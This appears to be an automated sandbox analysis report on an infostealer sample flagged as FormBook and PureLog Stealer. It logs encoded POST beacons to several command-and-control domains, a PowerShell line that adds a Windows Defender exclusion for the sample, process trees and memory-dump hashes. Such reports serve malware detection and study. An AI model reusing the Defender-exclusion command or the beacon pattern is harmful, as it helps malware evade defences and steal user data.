                                                                                                                                                Server: Apache
                                                                                                                                                Content-Encoding: gzip
Nov 25, 2024 09:45:37.664778948 CET  899  IN


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.4  50053        217.160.0.200   80                3164  C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 25, 2024 09:45:39.011440039 CET  806                OUT        POST /lnel/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                Referer: http://www.carsten.studio/lnel/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:45:40.365125895 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:40 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Encoding: gzip
Nov 25, 2024 09:45:40.365235090 CET  899  IN


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
47          192.168.2.4  50054        217.160.0.200   80                3164  C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 25, 2024 09:45:41.680648088 CET  10888              OUT        POST /lnel/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.carsten.studio
                                                                                                                                                Referer: http://www.carsten.studio/lnel/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:45:43.090595961 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:42 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Encoding: gzip
Nov 25, 2024 09:45:43.090739012 CET  899  IN


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
48          192.168.2.4  50055        217.160.0.200   80                3164  C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 25, 2024 09:45:44.569355011 CET  518                OUT        GET /lnel/?ifzt=Ribo6cOqqFxVl074lXpGE14xRzI3KKS1rVAQT2LhUo1xH+0e39DTDCE0P6QoW4LNcCjE4+6almbk+DseMcJWDalTnHVPsL+WixWnB7fmocU+RCDZF77iizc=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:45:45.806469917 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 4545
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:45 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Nov 25, 2024 09:45:45.806530952 CET  1236  IN
Nov 25, 2024 09:45:45.806576014 CET  1236  IN
Nov 25, 2024 09:45:45.806618929 CET  975  IN
                                                                                                                                                Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
49          192.168.2.4  50056        107.167.84.42   80                3164  C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 25, 2024 09:45:52.221162081 CET  780                OUT        POST /omhm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.cssa.auction
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.cssa.auction
                                                                                                                                                Referer: http://www.cssa.auction/omhm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=8Y7LUix1Mld3V0/kD20AdaQImbj6701BD/7j09qfY/JCE/JEbs19HO2Cm5rPXFPtFwXksRH2ZZqrUSGKbTtwLnmUbMgJoE3s7T+9KP9o8YXKhoyzEQj3BlAHrrP1jjXk9Kiw1p78YIPAmfh9a9SIuTMUaSy6bwQa3stjrOeKkZldOykdkSzgF8EuGN/QpF/sMQ==
Nov 25, 2024 09:45:53.457506895 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:45:53 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 25, 2024 09:45:53.457541943 CET | 253 | IN
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 50057 | 107.167.84.42 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:54.887394905 CET | 800 | OUT | POST /omhm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.cssa.auction
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.cssa.auction
                                                                                                                                                Referer: http://www.cssa.auction/omhm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=8Y7LUix1Mld3EkPkMxgAIqQHo7j6xU0ID//j04bHYJ5CHdBEcuN9GO2CuZrwIVPmFwabsQr2ZZ+rUQeKH1lzL3mWCcgHlk3s7T+9KOZS8YPKhbqzG1X0MFAI7bP1yzXg9Kio1t7SYOLAmad9aoyJgjMSCyzVXhxs7M0yst646oJXP0pH1jS3X8gdbK2kkGClXVNwdTo2+FXRrNqVO1DmcCQ=
Nov 25, 2024 09:45:56.165836096 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:45:55 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 25, 2024 09:45:56.165909052 CET | 253 | IN
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 50058 | 107.167.84.42 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:45:57.578844070 CET | 10882 | OUT | POST /omhm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.cssa.auction
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.cssa.auction
                                                                                                                                                Referer: http://www.cssa.auction/omhm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Data Ascii: ifzt= [TRUNCATED]
Nov 25, 2024 09:45:58.766074896 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:45:58 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 25, 2024 09:45:58.766140938 CET | 253 | IN
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 50059 | 107.167.84.42 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:46:00.236850023 CET | 516 | OUT | GET /omhm/?ifzt=xaTrXXt9Kjd4VWfnLz4MLqEmpY3f+jxhDbzO0ePZZ/F2G9w3aeU7HujdvobedEDJNQrJvHKMILqdCxDRZi1zA3XNT5QIvXDZ0i+KO+cUgqjZuYPkfG7cBF4=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.cssa.auction
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:46:01.479526043 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:46:01 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 25, 2024 09:46:01.479587078 CET | 253 | IN
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod



                                                                                                                                                Target ID:0
                                                                                                                                                Start time:03:41:57
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\IETC-24017.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\IETC-24017.exe"
                                                                                                                                                Imagebase:0x320000
                                                                                                                                                File size:768'512 bytes
                                                                                                                                                MD5 hash:2D9DA996EC68D0AC26B84D52A3298383
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1686417175.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:03:41:59
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"
                                                                                                                                                Imagebase:0xce0000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:03:41:59
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\IETC-24017.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\IETC-24017.exe"
                                                                                                                                                Imagebase:0xc00000
                                                                                                                                                File size:768'512 bytes
                                                                                                                                                MD5 hash:2D9DA996EC68D0AC26B84D52A3298383
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:03:41:59
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:03:42:02
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                                File size:496'640 bytes
                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:03:42:06
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe"
                                                                                                                                                Imagebase:0xd10000
                                                                                                                                                File size:140'800 bytes
                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:03:42:08
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\openfiles.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\openfiles.exe"
                                                                                                                                                Imagebase:0xa80000
                                                                                                                                                File size:60'416 bytes
                                                                                                                                                MD5 hash:50BD10A4C573E609A401114488299D3D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:03:42:34
                                                                                                                                                Start date:25/11/2024
                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                File size:676'768 bytes
                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true


                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:11.9%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:2.9%
                                                                                                                                                  Total number of Nodes:314
                                                                                                                                                  Total number of Limit Nodes:11

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Dp
                                                                                                                                                  • API String ID: 0-3490387063
                                                                                                                                                  • Opcode ID: cfd7e487f26de5d26482c1429063179246715103d157ec2131a366ab6809d11f
                                                                                                                                                  • Instruction ID: d1d03923c607bb4bcdf835ad7e0b215dbab4c95d058a30664546ef1db7fe727f
                                                                                                                                                  • Opcode Fuzzy Hash: cfd7e487f26de5d26482c1429063179246715103d157ec2131a366ab6809d11f
                                                                                                                                                  • Instruction Fuzzy Hash: 91B2B434A002199FDB14DF64D884ADDB7B2FF8A304F1181E9E949AB365DB31AE85CF50

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Dp
                                                                                                                                                  • API String ID: 0-3490387063
                                                                                                                                                  • Opcode ID: 50eb044d83e06cf945e90669d5c2a2bd39dc135668349084cc6c414f4f03224f
                                                                                                                                                  • Instruction ID: 9fd5dc0b0537a36850e4e09d9e9f33726b8ed11d583bd4c2bd8f270c5c49db19
                                                                                                                                                  • Opcode Fuzzy Hash: 50eb044d83e06cf945e90669d5c2a2bd39dc135668349084cc6c414f4f03224f
                                                                                                                                                  • Instruction Fuzzy Hash: 05A2C534A00219DFDB14DF64D894AE9B7B2FF8A304F1181E9E9496B361DB31AE85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7a2c0edad5600de41782bbbb7272dc46155e254cddc61c2ea81142b5473b04a2
                                                                                                                                                  • Instruction ID: 6ce687a7f9cce76108bc486d118ca04d2cd8f2f0fec87a4cd15ceb3f9de2226b
                                                                                                                                                  • Opcode Fuzzy Hash: 7a2c0edad5600de41782bbbb7272dc46155e254cddc61c2ea81142b5473b04a2
                                                                                                                                                  • Instruction Fuzzy Hash: 13327931B012049FDB58DBA9C654BAEBBF7AF88714F24446DE505AB3A1DB34ED02CB50

